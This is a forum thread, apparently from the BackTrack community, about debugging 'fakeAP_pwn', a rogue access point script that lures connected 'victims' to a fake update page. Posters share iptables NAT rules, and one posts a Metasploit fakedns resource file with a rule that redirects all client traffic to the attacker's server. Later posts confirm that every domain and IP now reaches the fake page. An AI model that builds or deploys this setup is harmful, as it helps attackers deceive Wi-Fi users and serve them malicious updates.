I have the same problem with the mobile internet - ppp0 interface. Please help.
Printable View
I have the same problem with the mobile internet - ppp0 interface. Please help.
Without a internet connection the client(victim) can connect to the AP without any problems - gets ip address etc. but browser does not get redirected to the update page. Enter 10.0.0.1 in the browser and it displays update page. Does this mean that I need a DNS server running to translate Google to 10.0.0.1. Any ideas or pointers please.
Non Transparent AP
when running without a connection to eth0 (i.e. no internet ) the script runs untill the clients browser tries to connect to wsearch.net and then "server not found"
enter any Ip address in browser (any numeric ) and then gets directed to our fake update page OK
I have tried - iptables -L -t nat - with and without eth0 connected and results as follows
========= differences =============
Not Working (no eth0 connection )
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere anywhere tcp dpt:www to:10.0.0.1
ACCEPT tcp -- anywhere anywhere tcp dpt:domain
Working (eth0 connected )
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
DNAT udp -- anywhere anywhere to:192.168.1.250
DNAT tcp -- anywhere anywhere tcp dpt:www to:10.0.0.1
ACCEPT tcp -- anywhere anywhere tcp dpt:domain
I guess I need to change my iptables to get this working. (udp 53 ?? )
Any ideas or pointers please
for non-transparent see if this works
echo "use auxiliary/server/fakedns" >> /tmp/fakedns_metasploit.rc
echo "set INTERFACE at0" >> /tmp/fakedns_metasploit.rc
echo "set SRVHOST 10.0.0.1" >> /tmp/fakedns_metasploit.rc
echo "set SRVPORT 53" >> /tmp/fakedns_metasploit.rc
echo "set TARGETHOST 10.0.0.1" >> /tmp/fakedns_metasploit.rc
echo "run" >> /tmp/fakedns_metasploit.rc
$xterm -geometry 75x15+10+215 -T "fakeAP_pwn v$version - Metasploit" -e "$dir_to_metasploit/msfconsole -r /tmp/fakedns_metasploit.rc" &
iptables -t nat -A PREROUTING -i at0 -j REDIRECT # Blackhole Redict everything to us
v0.2.4
+ Added arguments
+ Checks for superuser
+ Checks interfaces/paths/files exists
+ Improved transparent mode (Thanks joker5bb)
> General code improvements
> Updated the help message
Its not working for me when i run the script it says
The monitor interface mon0 , inst correct.
I tried this with the following 2 cards
Altheros 9825 and Realtek 8187
I tried to set the cards in monitor mode with the airmon-ng and with the iwconfig.
Monitor mode on both cards works and both are injection capable.
But it inst working. Someone knows a solution for this problem or have any ideas ?
yea about that, :o fixes will be in the next version :)Quote:
Originally Posted by keez3
I removed the space in the end of line 122 and it fixed the problem.. example..Quote:
Originally Posted by keez3
"$monitorInterface " to "$monitorInterface"
I believe quotations in bash give an exact response back to the system, basiclly giving that space in the end as an additional character, therefore not detecting the grep correctly and defaulting to an error.
Worked for me w/ a RTL8187 card good luck.
Non Transparent
thanks joker5bb the dns metasploit code you suggested worked fine in my own script that I have been playing with to make a NoN transparent AP.
I will try it in FakeAP_pwn script soon.
Was going to try v0.2.4 but it wont run with interface problems. Just seen the fix posted above. Will try when I have time.
thanks again.
well i have made many changes and fixesQuote:
Originally Posted by parrotface
also improved the fakedns as well
so just wait for v0.3
I have just tested the non-transparent mode in windows and linux
and here are the results
any domain - ex google.com redirects to our page
any IP -ex 1.1.1.1 redirects to our page
but going to something like this:
http://www.backtrack-linux.org/forums - fails to work properly, need fix in apache2
im going to fix starting script for apache2 as well
*edit*
apache2 starting script also fixed,